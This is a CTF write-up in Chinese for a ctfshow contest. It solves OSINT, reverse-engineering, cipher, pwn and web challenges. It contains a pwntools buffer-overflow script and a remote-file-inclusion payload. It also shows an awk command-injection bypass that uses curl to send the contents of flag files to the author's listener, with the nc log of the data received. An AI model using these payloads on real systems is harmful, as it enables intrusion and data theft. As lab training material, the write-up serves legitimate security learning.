OSINT
任性老板
用yandex
识图搜到虎扑的关于这个点的信息
https://bbs.hupu.com/27645621.html
通过评论知道这个店铺的名字叫左撇子私房面
通过百度搜索店名即可获得电话号码
蛤壳雪茄-1
谷歌识图找到原图
知道它是mary river aerodrome
这个
搜索得到
搜索这第一个公司的名字即可得到公司网站得到flag
re
re签到
拖到 IDA中
f5反汇编,看到
if ( !strcmp(v5, "V2toT2FWZ3pTbXhZTTA1d1dqSTFabUZYTldaaFNFNTZZek5PZW1NelRucGpkejA5") )
{
printf(format, v10);
}
猜测是base64
解密三次获得flag
magic
拖入IDA
看到反汇编代码,创建一个c文件重写每一个检查函数即可得到flag
#include<stdio.h>
#include<math.h>
int checksum(int a){
int v3 = 0;
while (a > 0){
v3 += a % 10;
a /= 10;
}
return v3==58;
}
int p(int a){
int i;
for (i = 2; sqrt(a) >= i; ++i){
if (!(a%i))
return 0;
}
return 1;
}
int h(int a){
int v2;
int v3;
int v4;
int v5;
int v6;
v2 = a;
v4 = 0;
while(v2 > 0){
v2 /= 10;
++v4;
}
v3 = a;
while (v3){
v5 = (int)(v3 / pow(10.0,v4-1));
v6 = v3 % 10;
v3 = (int)(v3 - pow(10.0,v4-1)*v5)/10;
if (v5 != v6)
return 0;
v4 -= 2;
}
return 1;
}
int main(){
int i = 0;
while(1){
if (checksum(i)&&p(i)&&h(i)){
printf("%d\n",i);
break;
}
i++;
}
return 0;
}
pwn
pwn签到
shell_here地址 0x80484f6
偏移地址计算: 0xffffd43c-0xffffd428
为 20
脚本
from pwn import *
#io = process("./pwn01")
host = "pwn.challenge.ctf.show"
port = 28030
io = remote(host,port)
io.recv()
io.sendline(b"a"*20+p32(0x80484f6))
io.interactive()
CRYPTO
The Dancing Men
这篇文章中讲的编码
https://blog.csdn.net/weixin_30278311/article/details/96365891
其中每个带旗子的小人代表一个单词的结束
意义翻译的得到最终的结果
please use underslash between every word with initials in capitalm the flag is everyone loves taoshen
web
web签到
发现它可以远程文件包含
用 python 开启一个http服务
python3 -m http.server 80
Paylaod
file=http://vps/1.php?id==di?php.1/spv//:ptth
1.php内容为要执行的php代码
<?php
echo sysetm("cat /f*");
?>
得到flag
easyPHP
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
error_reporting(0);
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
$param = $_POST['param'];
if(isset($cmd) && isset($param)){
$cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
shell_exec($cmd);
}
在这个网站上发现 awk执行代码
https://gtfobins.github.io/gtfobins/awk/
本来想反弹shell,但是不知道为什么就是不成功
payload
awk执行命令
awk 'BEGIN {system("/bin/sh")}'
Paylaod:
cmd=awk¶m=BEGIN {system("curl http://vps:port/ -d`cat /f*`")}
$ nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 49.235.148.38 59270 received!
POST / HTTP/1.1
Host: 101.42.106.217:4444
User-Agent: curl/7.69.1
Accept: */*
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
ctfshow{4cfa69be-43d3-4fc3-a474-be2e929f6e25}